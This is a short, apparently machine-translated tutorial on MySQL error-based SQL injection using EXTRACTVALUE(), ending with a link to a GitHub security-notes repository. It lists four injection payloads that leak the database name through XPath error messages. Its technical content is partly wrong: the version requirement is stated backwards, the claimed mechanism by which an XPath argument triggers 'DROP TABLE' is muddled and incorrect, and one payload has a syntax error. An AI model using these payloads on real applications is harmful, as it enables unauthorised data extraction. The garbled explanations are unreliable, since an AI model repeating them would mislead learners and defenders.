Table of contents
extractvalue() error injection
(***Note: Pay attention to the version requirements)
extractvalue() error injection
1. Grammar introduction:
Version:
MySQL<5.0.x
grammar:
EXTRACTVALUE(xml_expression, xpath_expression)
xml_expression is an XML type field or expression, and xpath_expression is an XPath expression used to specify the node to be extracted.
principle:
- First, the function parses the xml_expression and converts it into an XML document object.
- The function then uses the path specified by xpath_expression to locate the node to extract.
- Finally, the function returns the value of the found node
use:
Suppose a field xml_data of XML type, as follows
<book>
<title>Harry Potter</title>
<author>J.K. Rowling</author>
<year>2001</year>
</book>You can use the extractvalue() function to extract the node value, as follows
SELECT EXTRACTVALUE(xml_data, '/book/title') AS title,
EXTRACTVALUE(xml_data, '/book/author') AS author,
EXTRACTVALUE(xml_data, '/book/year') AS yearFROM books;The above SQL statement will extract the values of "title", "author" and "year" nodes from the xml_data field, and then return them as a result set
2. The reason for the error
cause:
In the extractvalue() function, if the xpath_expression parameter can be controlled by user input, an attacker can construct a malicious XPath expression to execute an injection attack. For example, an attacker can construct a malicious input so that the xpath_expression parameter becomes a malicious SQL statement.
Example:
SELECT * FROM books WHERE title = EXTRACTVALUE(xml_data, '/book/title')If the xpath_expression parameter can be controlled by user input, an attacker can construct a malicious input such as:
'; DROP TABLE books; --In this way, the final constructed XPath expression is:
/book/title'; DROP TABLE books; --When this malicious input is passed to the extractvalue() function, it executes the malicious XPath expression as an argument. Since the XPath expression contains a SQL comment (--), subsequent SQL statements will be ignored, resulting in the execution of the DROP TABLE books statement, and the books table is deleted.
payload:
and (extractvalue(1,concat('~'(select database()))));
and (extractvalue('anything',concat('/',(select database()))));
and (extractvalue('anything',concat('~',substring((select database()),1,5))));
and extractvalue(1,concat(0x7e,(select database()),0x7e))#network security coterie
GitHub - BLACKxZONE/Treasure_knowledge
https://github.com/BLACKxZONE/Treasure_knowledge